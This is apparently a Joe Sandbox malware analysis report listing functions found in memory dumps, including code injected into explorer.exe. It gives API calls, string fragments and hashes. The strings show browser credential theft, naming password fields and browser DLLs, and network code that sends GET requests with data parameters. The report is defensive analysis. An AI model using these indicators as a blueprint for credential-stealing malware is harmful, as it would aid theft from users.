Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11

Uniqueness

Uniqueness Score: -1.00%

Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01729175
$, xrefs: 01729191

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 017ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 017ACFBD

Strings

@4_w@4_w, xrefs: 017ACFD5, 017ACFDA, 017ACFF1
@, xrefs: 017ACF0A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4_w@4_w
API String ID: 4062629308-713214301
Opcode ID: c947538d8c760a6ee067b4c3ae726fd7f69aa054e05ff6e09db42c71bdac6664
Instruction ID: 0cecd451173ab2f64df69d689d345252cdf160cc3ab290731d8c203cb063335e
Opcode Fuzzy Hash: c947538d8c760a6ee067b4c3ae726fd7f69aa054e05ff6e09db42c71bdac6664
Instruction Fuzzy Hash: A241C172940215DFDB319FA9C884AAEFBB8FF94B10F10462AE914DB359E774C901CB61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3504, Parent PID: 7832COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	15

Executed Functions

Function 0FDA6F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0FDA712E
setsockopt.WS2_32 ref: 0FDA7830
recv.WS2_32 ref: 0FDA7859

Strings

&un=, xrefs: 0FDA74F1
dat=, xrefs: 0FDA7290
&sql, xrefs: 0FDA7471
: cl, xrefs: 0FDA7338
&br=, xrefs: 0FDA7509
ose, xrefs: 0FDA733F
nnec, xrefs: 0FDA732A
tion, xrefs: 0FDA7331
Co, xrefs: 0FDA7323
GET , xrefs: 0FDA7318

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: ffa67f15dc4e734115bbf3830a20efa468b51502de327a6abb9fa0257bbaf4cf
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: DA527D30614B088FCBA9EF68C4847E9B7E1FB54300F50466EC49BCB146DE75B549CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA6232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0FDA6449

Strings

`, xrefs: 0FDA641D

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: f3fd9ae4f05d0a076ccf49b37df9617724b80afb63b6c252214f90aac90915fc
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: A6223B70A18F09DFCB99EF28C4986AAB7E1FB58301F44062EE45ED7251DB31E452CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA7E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0FDA7E67

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 84ee7b730a9d0ada3858a590c2583215c9c82667b6d9a6b5c34f0f432af47b2e
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 98019E34628B484F8B88EF6C948412AB7E4FBC9214F000B3EA99AC3250EB65C5414742

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA7E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0FDA7E67

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: d622e0d85cb0b162907e6e4ef602d0251b7ca5e0abac821e09cff4d100c95f5a
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: CD01A234628B884B8B88EB3C94452A6B3E5FBCE314F000B3EE99AC3241DB25D5024786

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA18C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0FDA19A0

Strings

urlmon.dll, xrefs: 0FDA1959
nt: , xrefs: 0FDA191E
on.d, xrefs: 0FDA1902
User-Agent: , xrefs: 0FDA1935, 0FDA1948

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 7a7667b1a58491f7fd757ddc6328b1e8e2a3c9bb8bb9e63a06025fffbab7b41c
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2731CE31614B4C8FCB85EFA8C8847EEB7F0FB58204F40022AD85ED7241DE799645CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA18BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0FDA19A0

Strings

urlmon.dll, xrefs: 0FDA1959
nt: , xrefs: 0FDA191E
on.d, xrefs: 0FDA1902
User-Agent: , xrefs: 0FDA1935, 0FDA1948

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 0f372608d8fe8834468eb761ec07c8edb6287870bcb29592027698d3df0a1f37
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 9721CE30A14B4C8ECB85EFA8C8847EDBBB0FF58204F40422AD85AD7241DF799605CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0FD9DB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0FD9DCCA

Strings

el32, xrefs: 0FD9DBA0
.dll, xrefs: 0FD9DBCD
kern, xrefs: 0FD9DB99

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 5d8f261ee2a6ee9e6c1943de9b8d86ed7ccf21d69d832a442722a96b58ad1546
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 36418B70918A088FCF84EFA8C8987ADB7F1FB58300F44417AC84ADB256DA349945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0FD9DB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0FD9DCCA

Strings

el32, xrefs: 0FD9DBA0
.dll, xrefs: 0FD9DBCD
kern, xrefs: 0FD9DB99

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 8829ee501ecfce614073e109cf94e784fe3173d7e8f34accbadd35637cf69f8d
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 5C415A70918A088FDB84EFA8C8987EDB7E1FB68300F44416AC84ADB256DE349945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA372E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0FDA3791

Strings

conn, xrefs: 0FDA375A
ect, xrefs: 0FDA3761

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 549d70b5f2f5f9b3d5f36dee246883629a7fed770fcfb2f87b502318b8bd7a32
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: A0015A70618B188FCB84EF1CE088B55B7E0FB58324F1545AEE90DCB226CA75D8818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA3732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0FDA3791

Strings

conn, xrefs: 0FDA375A
ect, xrefs: 0FDA3761

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 8ebe0dd370dc4f037571fac0a82f17093e94010c75ef51550e7716b3e55eecf9
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: F4012C70618A1C8FCBC4EF5CE088B55B7E0FB59315F1541AEA80DCB226CA75C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA36B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0FDA3713

Strings

send, xrefs: 0FDA36DA

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: d1bcf20b06a235910ccd373219ebb211977623d9953d271f4863932493832a70
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: D4011270518A188FDBC4EF1CD048B2577E0EB58314F1545AED85DCB266C671D8818B85

Uniqueness

Uniqueness Score: -1.00%

Function 0FDA35B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0FDA3611

Strings

sock, xrefs: 0FDA35D9

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: c88bfd39564cd5b77a3b329841367e5ab840ea9b8eb2cafec3135edef8e50530
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 3D0121706187188FCB84EF1CD048B54BBE0FB59314F1545ADD45ECB266C7B5C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 0FD9B2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0FD9B32D

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: d9e08b00f02e6302c347fc63c5904b02a8c0e32be69f3664920701c682c14bf9
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 33314E74618B09DADFA4EFA990882E5B7A1FB94300F85426FC91DCB107C775A250CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FD9B412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0FD9B461

Memory Dump Source

Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 356c5110fd896de95b84ff69cc72a5ed182b48124bd5fe55b9232743c7d60a4f
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: ACF0F630268B484FDBC8EF2CD48563AF3D0FBE8214F45063EA94DC3265DA79C5828B16

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0E3ACD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

wini, xrefs: 0E3ACF72
M, xrefs: 0E3AD082
S, xrefs: 0E3AD073
.dll, xrefs: 0E3ACF2F
dll, xrefs: 0E3ACF4C
net., xrefs: 0E3ACF44
32.d, xrefs: 0E3ACF0B
el32, xrefs: 0E3ACF27
user, xrefs: 0E3ACF03
ll, xrefs: 0E3ACF13
kern, xrefs: 0E3ACF5A

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 1b00e5c6f18b88b8bded5d4d6a21c12ce8344f6ba3ee5cef923ba4f08ea452fd
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: CAE16B70618F488FCBA4EF68C4947EABBE1FB58301F404A2E959BC7655DF30A941CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AF792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

ypte, xrefs: 0E3AF8A5
name, xrefs: 0E3AF87D
ypte, xrefs: 0E3AF8DA
swor, xrefs: 0E3AF8EA
dUse, xrefs: 0E3AF8AD
e, xrefs: 0E3AF8BD
rnam, xrefs: 0E3AF8B5
d, xrefs: 0E3AF8F2
user, xrefs: 0E3AF876
itUR, xrefs: 0E3AF85D
form, xrefs: 0E3AF84D
Subm, xrefs: 0E3AF855
encr, xrefs: 0E3AF8D2
dPas, xrefs: 0E3AF8E2
Fiel, xrefs: 0E3AF884
guid, xrefs: 0E3AF7CE
encr, xrefs: 0E3AF89D

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 36ad1183cb5086263242be1b54754b7f205397a4febea1ffe7de00c77bc1e680
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 8AB19D30A18B488EDB15EF68C485AEEBBF1FF98300F504A1ED59BC7251DF7099058B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AD622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

2, xrefs: 0E3AD674
n, xrefs: 0E3AD6BA
p, xrefs: 0E3AD690
l, xrefs: 0E3AD6D6
s, xrefs: 0E3AD689
u, xrefs: 0E3AD661
d, xrefs: 0E3AD67B
d, xrefs: 0E3AD6CF
e, xrefs: 0E3AD66D
i, xrefs: 0E3AD69E
l, xrefs: 0E3AD682
d, xrefs: 0E3AD6A5
n, xrefs: 0E3AD6C1
t, xrefs: 0E3AD6C8
c, xrefs: 0E3AD697
w, xrefs: 0E3AD6B3
l, xrefs: 0E3AD6AC

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 81d61c128b1d5d847bdbcdfc8fe306d11df46bef69ff47cbd5335bcb8ca8a81f
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: B741E270A18B088FDB18DF88A4457BE7BE2FB88708F44025ED909D3241DBB19D85CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B4AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 0E3B4C90
[, xrefs: 0E3B4CCD
[, xrefs: 0E3B4C2D
], xrefs: 0E3B4CA8
b, xrefs: 0E3B4C73
[, xrefs: 0E3B4BF6
[, xrefs: 0E3B4C66
e, xrefs: 0E3B4CA0
l, xrefs: 0E3B4C35
c, xrefs: 0E3B4C0B
D, xrefs: 0E3B4CDA
], xrefs: 0E3B4C3D
n, xrefs: 0E3B4C98
l, xrefs: 0E3B4CE2

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 7aea655424b29cbf534c5d78cf53df4ffe15035273e2c07f28e03c6c2b6afe4f
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 01C15B70218B099FC758EF28C4956EAFBE5FB98304F404B2E959BC7610DF30A955CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B4F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 0E3B4F63
0, xrefs: 0E3B4F5B
r, xrefs: 0E3B4FC0
r, xrefs: 0E3B4FB8
r, xrefs: 0E3B4F90
r, xrefs: 0E3B4F88
r, xrefs: 0E3B4FA8
c, xrefs: 0E3B4FC8
r, xrefs: 0E3B4F98
n, xrefs: 0E3B4F6B
r, xrefs: 0E3B4FB0
r, xrefs: 0E3B4FA0

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 8862a70fb51c4b20b2526fa164c341a288886b1a9ea136c30fc3efe6a174fa85
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 7E51C6315187488FD719DF18D4816EAB7E6FBC5700F501A2EE9CBC7642DBB49906CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AE2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 0E3AE614
dll, xrefs: 0E3AE32E
sspi, xrefs: 0E3AE320
nspr, xrefs: 0E3AE4D4
opera_browser.dll, xrefs: 0E3AE629
4.dl, xrefs: 0E3AE4DB
cli., xrefs: 0E3AE327
l, xrefs: 0E3AE4E2

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: a9d1cba105ed338a785dcc41e1f293c9ea51617144154c2df801f93d5718281a
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 3FC18C70618A198FC758EB68D495AEABBE5FB98300F45472E854FC7250DF30EE42CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AE2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 0E3AE614
dll, xrefs: 0E3AE32E
sspi, xrefs: 0E3AE320
nspr, xrefs: 0E3AE4D4
opera_browser.dll, xrefs: 0E3AE629
4.dl, xrefs: 0E3AE4DB
cli., xrefs: 0E3AE327
l, xrefs: 0E3AE4E2

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 1eb8a0236c4d82fdef283f28e0258ac97da5bfc1e1a0077639f4ff699e70b354
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 12C1AE70618A198FC758EB68D495AEABBE5FB98300F45472E854FC7250DF30EE42CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AFCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 0E3AFD97
2, xrefs: 0E3AFDE1
L: , xrefs: 0E3AFD66
word, xrefs: 0E3AFD9E
UR, xrefs: 0E3AFD5F
name, xrefs: 0E3AFDB2
User, xrefs: 0E3AFDAB

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 27c2fa067e8d553ad9e89c5c2b7944b8bcc0f9f3634da017df606a0f4c1caec2
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: EDA18070A187488FDB19EFA8D4447EEBBE1FF98300F404A2ED58AD7251EF7099458789

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AFCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 0E3AFD97
2, xrefs: 0E3AFDE1
L: , xrefs: 0E3AFD66
word, xrefs: 0E3AFD9E
UR, xrefs: 0E3AFD5F
name, xrefs: 0E3AFDB2
User, xrefs: 0E3AFDAB

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin
